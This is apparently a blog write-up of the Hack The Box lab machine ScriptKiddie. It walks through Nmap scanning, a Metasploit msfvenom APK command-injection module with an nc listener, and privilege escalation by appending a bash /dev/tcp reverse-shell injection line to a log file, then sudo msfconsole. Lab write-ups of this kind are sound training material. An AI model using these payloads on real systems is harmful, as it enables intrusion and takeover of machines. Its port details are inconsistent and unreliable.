Hack The Box writeup - ScriptKiddie

Today we will solve box ScriptKiddie, easy box by Hack The Box (HTB). For those who don't know, HTB is a practice platform to learn penetration testing.

Box Details

Box NameScriptKiddie
OSLinux
DifficultyEasy
IP10.10.10.226
Points20

Summary

  1. Connect HTB VPN connection.
  2. Start ScriptKiddie box from HTB portal and ping the machine IP.
  3. Start with Nmap. Found two ports 22 and 5555 open.
  4. Browse http://10.10.10.226:5000.
  5. Found functionality of msfvenom on webpage.
  6. Search Google for msfvenom exploit.
  7. Found exploit.
  8. Use msfconsole to generate msf.apk
  9. Upload it on web and set up listener.
  10. Got user kid.
  11. Check scanlosers.sh
  12. Rewrite hackers file and got pwn shell.
  13. Check sudo permissions on pwn shell.
  14. sudo root and found root flag.

Start with Nmap

Basic Scan

nmap 10.10.10.226

Run default scripts (-sC), enumerate version (-sV) against target.

nmap -sC -sV 10.10.10.226

Scan all ports once by using -p- option. This step will ensure the coverage of all open ports.

nmap -p- 10.10.10.226

UDP scan

You can use below command for UDP scan. Although, I have not found anything.

nmap -sU -p- 10.10.10.226

Check in Web Browser

Browse http://10.10.10.226:5000

Play with webpage. Just type IP to see response.

The webpage (payloads) shows a functionality similar to msfvenom tool. I have tried to search exploit of msfvenom that may help me to get user shell.

Found "Rapid7 Metasploit Framework msfvenom APK Template Command Injection".

Read Description. As mentioned in description, This vulnerability helps in perform command injection. By using msfconsole, we will create apk file to upload on our web tool.

Open Metasploit on Kali machine. Now we will create apk file by using msfconsole.

msfconsole

Search exploit by typing below command.

search msfvenom

Found exploit. Now for creating apk file, use below command to select and then display options.

use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection

show options

Use ifconfig command to find IP and set it to lhost. lport you can put 1111.

set lhost 10.10.14.2

set lport 1111

set rhost 10.10.10.226

set rport 5555

Now apk file is generated by msfconsole. As mentioned in terminal, msf.apk stored at /home/kali/.msf4/local/msf.apk. Now select os as android and lhost is IP of your Kali system. Locate msf.apk and click on generate. But set up listener by using nc -lvnp 1111 command before click on generate.

Got reverse shell on nc. You can confirm user by using id and ifconfig command.

id

ifconfig

Get a interactive shell by using below command.

python3 -c 'import pty; pty.spawn("/bin/sh")'

Now navigate and use below commands to know more about remote system. Use pwd to know present working directory, cd for change directory, ls -l for listing files and wc for word count user.txt file.

pwd

cd ..

ls -l

wc user.txt

Privilege Escalation

Notice two user lid and pwn accounts. Two directories kid and pwn available. File pwn seems to be interesting.

Just browse the directory pwn. List out directories by using ls -l command.

ls -l

cat scanlosers.sh

Log file contains directory /home/kid/logs/hackers. Remember cut command truncate first two fields.

Just check permission by using ls -l command.

Use below command

echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/2222 0>&1' #' >> hackers

nc -lvnp 2222

Got user pwn shell. Now get a interactive shell.

python3 -c 'import pty; pty.spawn("/bin/sh")'

Check sudo permissions. Found user msfconsole, login is allowed without password.

sudo -l

Sudo user msfconsole.

sudo msfconsole

Check id

Found root.txt file.

Subscribe us to receive more such articles updates in your email.

If you have any questions, feel free to ask in the comments section below. Nothing gives me greater joy than helping my readers!

Disclaimer: This tutorial is for educational purpose only. Individual is solely responsible for any illegal act.

You may also like...

Leave a Reply

Your email address will not be published.